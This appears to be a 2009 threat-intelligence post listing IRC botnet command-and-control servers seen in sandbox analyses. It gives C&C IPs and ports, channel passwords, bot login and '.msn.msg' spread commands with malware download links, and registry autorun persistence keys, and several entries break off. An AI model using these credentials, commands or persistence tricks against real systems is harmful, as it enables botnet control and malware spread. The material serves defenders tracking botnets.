Month: December 2009

xx.nadnadzz.info (VaneBot)

xx.nadnadzz.info:5190
Now talking in #m
Topic On: [ #m ] [ =NuGITTP9xJfGNsT11y7ZTNlmnxwJ6cqiUAX70HX7sFxHUIpR833LVoJB7TaUK1Pzr6ddH/IiXKspDoGDbNVV2Gj3x/Y3qj1oQzyBsLjfUNELAMp ]
Topic By: [ k1a3 ]
Modes On: [ #m ] [ +smntSMCu ]
Resolved : [xx.nadnadzz.info] To [67.43.236.67]

92.240.234.164 (Mouse’s 100k botnet)

Remote Host      Port Number
92.240.234.164   3305

NICK P|hy4m13g8c
USER kv7ucu7y9 * 0 :USA|XP|601
USERHOST P|hy4m13g8c
MODE P|hy4m13g8c
JOIN #mm RSA
PRIVMSG #mm :+Cpiwe/Bec9E07RQ/c0vtb4S//EdYX/xXUDj093Z0X0JV7.c0puSW4.pimDm1LRefR1ZyBMf0vZEvo.KMXSW1c0M3m/Fwv310uA.y6/SUz0u/OGWL5.gwJqI.6pkc9.kty0t0KWEjq.nHZN20/qQ08.asyjW/qqA8J1QcT5G1
PASS secretpass

Other details
  * The following ports were open in the system:

    Port    Protocol  Process
    69      UDP       unwise_.exe (%FontsDir%\unwise_.exe)
    1052    TCP       unwise_.exe (%FontsDir%\unwise_.exe)
    20620   TCP       unwise_.exe (%FontsDir%\unwise_.exe)

Registry Modifications
  * The following Registry Keys were created:
    o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT

legend.rootyou.org (spybot server)

83.217.70.132:443
Nick: rrzhk
Username: rrzhk
Joined Channel: #spybot with Password chanpass
Private Message to Channel #spybot: “Version:spybot1.2c cpu: 0MHz. ram: 127MB total, 28MB free 77% in use os: Windows XP [Service Pack 3] (5.1, build 2600). uptime: 0d 0h 9m. Date: 02:Jul:2009 Time: 14:21:37 Current user: Administrator IP:192.168.0.2 Hostname:pc Windir: C:\WINDOWS Systemdir: C:\WINDOWS\system32”
Private Message to Channel #spybot: “Keylogger

79.172.162.116

Host Name        IP Address
79.172.162.116   79.172.162.116

Outgoing connection to remote server: 79.172.162.116 TCP port 3085

DNS Lookup
Host Name        IP Address
79.172.162.116   79.172.162.116

Outgoing connection to remote server: 79.172.162.116 TCP port 3085
Outgoing connection to remote server: 79.172.162.116 TCP port 3085
Outgoing connection to remote server: 79.172.162.116 TCP port 3085
Outgoing connection to remote server: 79.172.162.116 TCP port 3085

Registry Changes by all processes
Create

irc.priv8net.com

Remote Host      Port Number
208.98.57.48     2201

NICK rpvlut
USER vafssj “” “kgq” :vafssj
PONG :FDFA11A9
JOIN #unf mks
PONG :irc.priv8net.com
PASS MSMS

Registry Modifications
  * The following Registry Key was created:
    o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612}
  * The newly created Registry Value is:
    o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612}]
      + StubPath = “c:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\iseL2.exe”
        so that iseL2.exe runs every time Windows starts
  * The

load.h4ck.biz

User Name: nvvltp
Host Name: 0
Server Name:
Real Name: N00|172|USA|XPSP3|Jim|XM
Password: l33t
Nick Name: N00|172|USA|XPSP3|Jim|XM
Non RFC Conform: 1
ChannelName: #v3#
Password: fuckd
Topic Deleted: :
Notice Message Deleted
Value: :leaf2.kredkrew.net NOTICE AUTH :*** Looking up your hostname…

load.h4ck.biz 98.30.184.56
  * C&C Server: 98.30.184.56:53381
  * Server Password:
  * Username: inzv
  * Nickname: N00|10|DEU|XPSP3|Administrator|FF
  * Channel: #v3# (Password: fuckd)
  * Channeltopic: second server from same

bb1.th3kings.net

bb1.th3kings.net 208.96.62.2
  * C&C Server: 208.96.62.2:27034
  * Server Password:
  * Username: XP-4565
  * Nickname: [00|DEU|217387]
  * Channel: #!!kk!!# (Password: aaaaaaa)
  * Channeltopic: :.msn.msg Is this your Pictur? http://larvax.com/fotos.exe?=

Registry Changes by all processes
Create or Open
Changes
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce “wextract_cleanup0” = rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 “C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP”
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Java Update” = fitnets.exe.exe
Reads
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared “CUAS”
  HKEY_CURRENT_USER\Keyboard Layout\Toggle “Language Hotkey”
  HKEY_CURRENT_USER\Keyboard Layout\Toggle “Layout Hotkey”
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF “EnableAnchorContext”
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

k2r.th3kings.net

k2r.th3kings.net 208.96.62.2
  * C&C Server: 208.96.62.2:27034
  * Server Password:
  * Username: XP-2677
  * Nickname: [00|DEU|401746]
  * Channel: #!!kk!!# (Password: aaaaaaa)
  * Channeltopic: :.msn.msg Is this your Pictur? http://larvax.com/fotos.exe?=

Registry Changes by all processes
Create or Open
Changes
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce “wextract_cleanup0” = rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 “C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP”
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Java Update” = buthass.exe.exe
Reads
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared “CUAS”
  HKEY_CURRENT_USER\Keyboard Layout\Toggle “Language Hotkey”
  HKEY_CURRENT_USER\Keyboard Layout\Toggle “Layout Hotkey”
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF “EnableAnchorContext”
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

bub.th3kings.net

bub.th3kings.net 217.148.32.202
  * C&C Server: 217.148.32.202:27034
  * Server Password:
  * Username: XP-1568
  * Nickname: [00|DEU|051548]
  * Channel: #!!kk!!# (Password: aaaaaaa)
  * Channeltopic: :.msn.msg Is this your Pictur? http://th3bestgirl.com/fotos.exe?=
  * Private Message Deleted
    o Value: :Cs!XP@yes.gov PRIVMSG #!!kk!!# :.login yeste
    o Value: :Cs!XP@yes.gov PRIVMSG #!!kk!!# :.msn.msg Is this your Pictur? http://th3bestgirl.com/chek.exe?=

Registry Changes by all processes
Create

CancerTreatmentCenter.org

Remote Host      Port Number
199.71.215.177   51987

MODE pLagUe{USA}91936 -ix
JOIN #Plague
PONG CancerTreatmentCenter.org
PRIVMSG #Plague :New PC Infected.

  * The following port was open in the system:

    Port    Protocol  Process
    1052    TCP       raidhost.exe (%Windir%\raidhost.exe)

Registry Modifications
  * The newly created Registry Value is:
    o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
      + raidhost = “raidhost.exe”
        so that raidhost.exe runs every time Windows starts

Memory Modifications
  *